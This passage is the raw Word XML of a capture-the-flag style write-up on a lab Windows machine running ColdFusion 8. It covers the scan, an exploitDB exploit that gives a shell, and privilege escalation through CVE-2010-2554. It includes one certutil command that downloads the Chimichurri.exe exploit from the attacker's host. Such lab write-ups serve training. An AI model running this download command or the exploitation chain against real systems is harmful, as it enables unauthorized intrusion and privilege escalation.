    <w:p w14:paraId="0D0EA927" w14:textId="65914334" w:rsidR="00CB3015" w:rsidRPr="00D265A3" w:rsidRDefault="008224F8">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465159"/>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46516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4AAC9CD3" w14:textId="77777777" w:rsidR="00100B03" w:rsidRDefault="00100B03" w:rsidP="00100B03">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A10A126" wp14:editId="78AE3D81">
            <wp:extent cx="6120130" cy="1946910"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1255294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94825" name="Immagine 1255294825"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="1946910"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8742A6" w14:textId="3CF936DF" w:rsidR="00CB3015" w:rsidRDefault="00100B03" w:rsidP="00100B03">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc169461191"/>
      <w:r w:rsidRPr="00100B03">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00100B03">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005347BB">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00100B03">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - nMap scan results</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="48BA3A34" w14:textId="3D8698DB" w:rsidR="00D265A3" w:rsidRDefault="00100B03" w:rsidP="00060C0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Open ports are 135, 8500 and 49154. So, this box has an RPC service enabled on ports 135 and 49154 and another service on port 8500. NMap is not sure about which service is running on port 8500 and it guesses it is FMTP. Also, nMap guesses that OS is Windows, but I haven’t any more specific details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCA4B44" w14:textId="287FE76D" w:rsidR="00D265A3" w:rsidRDefault="00D265A3" w:rsidP="00D265A3">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc169465161"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Initial foothold</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="592554D6" w14:textId="2D4E2575" w:rsidR="00D265A3" w:rsidRDefault="00100B03" w:rsidP="00D265A3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Since nMap didn’t recognize for sure the service running on port 8500, I looked for it on Internet. So, I found that on that port can be run a </w:t>
      </w:r>
      <w:r w:rsidRPr="00100B03">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Macromedia ColdFusion MX Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This kind of server allow the remote access on this port as web server. As confirmation, I tried to navigate to </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00C92401">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://10.10.10.11:8500/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and I was able to navigate the server filesystem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3140DE1B" w14:textId="77777777" w:rsidR="00100B03" w:rsidRDefault="00100B03" w:rsidP="00100B03">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ADA177C" wp14:editId="15AD249D">
            <wp:extent cx="6120130" cy="1917700"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="13278483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48311" name="Immagine 1327848311"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="1917700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D53CC2" w14:textId="71FFCEB0" w:rsidR="00100B03" w:rsidRDefault="00100B03" w:rsidP="00100B03">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc169461192"/>
      <w:r w:rsidRPr="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005347BB">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Macromedia ColdFusion MX Server remote acceess</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="25AEDA9B" w14:textId="25FE0BCD" w:rsidR="00100B03" w:rsidRDefault="004B23E9" w:rsidP="00D265A3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Browsing the documentation, I was able to identify the ColdFusion version, as shown in the following figure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124D71E1" w14:textId="77777777" w:rsidR="004B23E9" w:rsidRDefault="004B23E9" w:rsidP="004B23E9">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B641CC6" wp14:editId="425128A2">
            <wp:extent cx="6120130" cy="3591560"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="16970375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37560" name="Immagine 1697037560"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="3591560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B0016E" w14:textId="3CA56E41" w:rsidR="004B23E9" w:rsidRDefault="004B23E9" w:rsidP="004B23E9">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc169461193"/>
      <w:r w:rsidRPr="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005347BB">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - ColdFusion version</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="32AC37E7" w14:textId="108CC7B6" w:rsidR="00D265A3" w:rsidRDefault="00D265A3" w:rsidP="00D265A3">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc169465162"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>User flag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="4FFDD6C6" w14:textId="0D1EA3D9" w:rsidR="00D265A3" w:rsidRDefault="004B23E9" w:rsidP="00D265A3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>At this point, I looked for an exploit on Internet regarding the ColdFusion 8 server. I found one on exploitDB, set it up and run. In this way, I obtained a shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F602E9" w14:textId="77777777" w:rsidR="004B23E9" w:rsidRDefault="004B23E9" w:rsidP="004B23E9">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6888106F" wp14:editId="477B0648">
            <wp:extent cx="6120130" cy="3195955"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="61158287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2876" name="Immagine 6115828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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3798F9" w14:textId="257D55F3" w:rsidR="004B23E9" w:rsidRDefault="004B23E9" w:rsidP="004B23E9">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc169461194"/>
      <w:r w:rsidRPr="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005347BB">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Exploit ColdFusion 8</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="2C34E53E" w14:textId="6B5E5506" w:rsidR="00D265A3" w:rsidRDefault="004B23E9" w:rsidP="00D265A3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In this case I didn’t need to set up a listener because the exploit code did it for me. So, it was the time to retrieve the user flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189414C7" w14:textId="77777777" w:rsidR="004B23E9" w:rsidRDefault="004B23E9" w:rsidP="004B23E9">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12A657D7" wp14:editId="12EBAD2F">
            <wp:extent cx="4335627" cy="2639492"/>
            <wp:effectExtent l="0" t="0" r="8255" b="8890"/>
            <wp:docPr id="188057363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73632" name="Immagine 1880573632"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4335627" cy="2639492"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B7C6B9" w14:textId="3522ED9C" w:rsidR="00D265A3" w:rsidRDefault="004B23E9" w:rsidP="004B23E9">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc169461195"/>
      <w:r w:rsidRPr="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005347BB">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - User flag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="2891A773" w14:textId="2E9A9447" w:rsidR="00D265A3" w:rsidRPr="00CB3015" w:rsidRDefault="00D265A3" w:rsidP="00D265A3">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc169465163"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Privilege escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="112737BA" w14:textId="7E86EDE8" w:rsidR="00D265A3" w:rsidRDefault="004B23E9" w:rsidP="00D265A3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To perform the privilege escalation, I found a possibly vulnerability regarding the user privileges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5EDB9D" w14:textId="77777777" w:rsidR="004B23E9" w:rsidRDefault="004B23E9" w:rsidP="004B23E9">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E63AB72" wp14:editId="4B3B0A22">
            <wp:extent cx="6120130" cy="3670300"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="7375516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51603" name="Immagine 737551603"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="3670300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3892B1" w14:textId="15F050C0" w:rsidR="004B23E9" w:rsidRPr="00D265A3" w:rsidRDefault="004B23E9" w:rsidP="004B23E9">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc169461196"/>
      <w:r w:rsidRPr="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005347BB">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Vulnerability to escalate privileges</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="29295B9C" w14:textId="15550F8F" w:rsidR="00D265A3" w:rsidRDefault="002841EE" w:rsidP="00D265A3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This vulnerability is known as CVE-2010-2554. </w:t>
      </w:r>
      <w:r w:rsidR="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To exploit this vulnerability, I uploaded on the target machine Chimichurri running the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D04E8BE" w14:textId="58EB6F0C" w:rsidR="004B23E9" w:rsidRPr="00D265A3" w:rsidRDefault="004B23E9" w:rsidP="00D265A3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <m:oMathPara>
        <m:oMath>
          <m:r>
            <w:rPr>
              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <m:t>certutil -urlcache -f http://10.10.14.20:9989/Chimichurri.exe Chimichurri.exe</m:t>
          </m:r>
        </m:oMath>
      </m:oMathPara>
    </w:p>
    <w:p w14:paraId="5D802752" w14:textId="72056377" w:rsidR="00D265A3" w:rsidRDefault="004B23E9" w:rsidP="00060C0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>At this point, I run it as shown in the following figure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C113F57" w14:textId="77777777" w:rsidR="004B23E9" w:rsidRDefault="004B23E9" w:rsidP="004B23E9">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16E541D6" wp14:editId="7B42A9DA">
            <wp:extent cx="6221095" cy="294983"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9424647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64711" name="Immagine 942464711"/>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6618549" cy="313829"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66630E84" w14:textId="3BB536A4" w:rsidR="004B23E9" w:rsidRDefault="004B23E9" w:rsidP="004B23E9">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc169461197"/>
      <w:r w:rsidRPr="004B6CE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="004B6CE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005347BB">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004B6CE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Privesc</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="4900400F" w14:textId="411D17A3" w:rsidR="004B23E9" w:rsidRDefault="004B6CE4" w:rsidP="00060C0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Finally, I was able to retrieve the root/administrator flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6941C769" w14:textId="77777777" w:rsidR="004B6CE4" w:rsidRDefault="004B6CE4" w:rsidP="004B6CE4">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17B8B4C6" wp14:editId="732D43CA">
            <wp:extent cx="4230810" cy="2925357"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="70364513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5131" name="Immagine 703645131"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4230810" cy="2925357"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45430A3F" w14:textId="7172DBB3" w:rsidR="004B6CE4" w:rsidRPr="00F71FE2" w:rsidRDefault="004B6CE4" w:rsidP="004B6CE4">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc169461198"/>
      <w:r w:rsidRPr="00F71FE2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00F71FE2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005347BB">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00F71FE2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
